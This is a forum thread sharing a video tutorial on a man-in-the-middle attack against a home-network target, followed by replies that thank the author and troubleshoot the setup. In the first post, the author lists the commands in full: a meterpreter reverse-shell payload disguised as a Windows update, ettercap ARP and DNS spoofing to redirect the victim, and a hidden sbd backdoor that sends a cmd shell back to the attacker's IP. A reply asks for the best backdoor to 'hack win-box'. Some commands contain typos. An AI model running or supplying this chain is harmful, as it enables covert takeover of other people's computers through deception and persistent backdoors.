Results 1 to 7 of 7

Thread: [Video] Man In The Middle (MITM) Attack (ettercap, metasploit, sbd)

Hybrid View

  1. #1

    Arrow [Video] Attack: Man In The Middle {MITM} (ettercap, metasploit, SBD)

    Links
    Watch video on-line: http://g0tmi1k.blip.tv/file/2319124
    Download video: http://www.mediafire.com/download.php?ml5lto4ykyq
    Commands: http://pastebin.com/f6f4a936


    What is this?
    By setting up a fake web site, we social engineer our target to run our exploit. The end result gives us command line access to our target's PC.


    How does this work?

    > Ettercap to do the MITM Attack
    > Metasploit for the exploit
    > Secure BackDoor (SBD) for the backdoor
    > Apache for the web server


    What do I need?
    > Ettercap
    > Metasploit
    > A web server
    > SBD (optional)
    *all of this is on backtrack 4*


    Network Setup:
    Attackers IP: 192.168.1.104
    Targets IP: 192.168.1.101
    Gateway IP: 192.168.1.1


    Software
    Name: Ettercap
    Version: 0.7.3
    Home Page: http://ettercap.sourceforge.net
    Download Link: http://prdownloads.sourceforge.net/e...ar.gz?download

    Name:Metasploit
    Version: 3.3
    Home Page: http://www.metasploit.com/
    Download Link: http://prdownloads.sourceforge.net/e...ar.gz?download

    Name: SBD
    Version: 1.36
    Home Page: http://tigerteam.se
    Download Link: http://prdownloads.sourceforge.net/e...ar.gz?download
    Source: http://www2.packetstormsecurity.org/...earchvalue=sbd


    Commands:
    Code:
    /pentest/exploits/framework3/msfpayload/meterpreter/reverse_tcp LHOST=192.168.1.104 X > /var/www/Windows-KB183905-x86-ENU.exe
    kate /var/www/index.html
    >*Relace filename with new one, Windows-KB183905-x86-ENU.exe*
    use exploit/multi/handler
    set PAYLOAD windows/meterpreter/reverse_tcper
    SET LHOAT 192.168.1.104
    exploit
    
    cd /usr/share/ettercap/mv -f etter.dns etter.dns.old
    kate etter.dns
    > * A 192.168.1.104
    ettercap -i wlan0 -T -q -P dns_spoof -M ARP /http://192.168.1.1/ /http://192.168.1.101/
    
    upload /root/tools/backdoors/sbd-1.36/sbd.exe C:/
    execute -H -f "C:/sbd.exe -q -r 10 -k g0tmi1k -e cmd -p 7332 192.168.1.104"
    
    wine /root/tools/backdoors/sbd-1.36/sbd.exe -l -k g0tmi1k -p 7332
    Notes:
    Sorry for the poor video editing on this one - it is cut from a final video called "g0tmi1k's home network" which is still incomplete.

    Video length: 06:57
    Capture length: 7:40
    Song: Mr. Scruff - Is He Ready, Mr. Scruff - Get a Move On

    Blog Post: http://g0tmi1k.blogspot.com/2009/07/videotutorial-man-in-middle-mitm-attack.html
    Forum Post: http://forums.remote-exploit.org/bt4-videos/27173-video-man-middle-mitm-attack-ettercap-metasploit-sbd.html



    ~g0tmi1k
    ~ Have you, g0tmi1k? ~
    :rolleyes: <(^^,)> :p d[-_^]b (= =D-->--< :eek:

  2. #2
    coool
    Guest

    Default

    thank you

    can upload your index.html

  3. #3
    Just burned his ISO
    Join Date
    Aug 2009
    Posts
    5

    Thumbs up

    [QUOTE=g0tmi1k;140447]Hey all!

    Using a few tools to gain access to command line on the target PC.

    What is this?
    By setting up a fake web site, we social engineer our target to run our exploit. The end result gives us command line access to our target's PC.

    How does this work?
    > Ettercap to do the MITM Attack
    > Metasploit for the exploit
    > Secure BackDoor (SBD) for the backdoor
    > Apache for the web server

    What do I need?
    > Ettercap
    > Metasploit
    > SBD (optional)
    > Web server
    *all of this is on backtrack 4*

    How to:
    Attackers IP: 192.168.1.104
    Targets IP: 192.168.1.101
    Gateway IP: 192.168.1.1

    Notes:
    This is cut from my final video called "g0tmi1k's home network".


    Thank you
    I will drink the milk

  4. #4
    Junior Member
    Join Date
    Jan 2010
    Posts
    84

    Default

    Great Tuto

    what's the best backdoor can work under linux to hack win-box ?

  5. #5
    Administrator sickness's Avatar
    Join Date
    Jan 2010
    Location
    Behind the screen.
    Posts
    2,921

    Default

    Excelent tutorial but I have a little problem. I practice in my home network and whan I activate dns_spoof in ettercap and go to my other computer and start Internet Explorer it doesn't show me the Index I created.

    P.S. : sniffing with ettercap works and other stuff

  6. #6
    Just burned his ISO
    Join Date
    Jan 2010
    Posts
    12

    Default

    Quote Originally Posted by sickness View Post
    Excelent tutorial but I have a little problem. I practice in my home network and whan I activate dns_spoof in ettercap and go to my other computer and start Internet Explorer it doesn't show me the Index I created.

    P.S. : sniffing with ettercap works and other stuff
    -> Hi,
    Have you started your apache on your attacker computer?

  7. #7
    Administrator sickness's Avatar
    Join Date
    Jan 2010
    Location
    Behind the screen.
    Posts
    2,921

    Default

    Apache running ... but still nothing

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •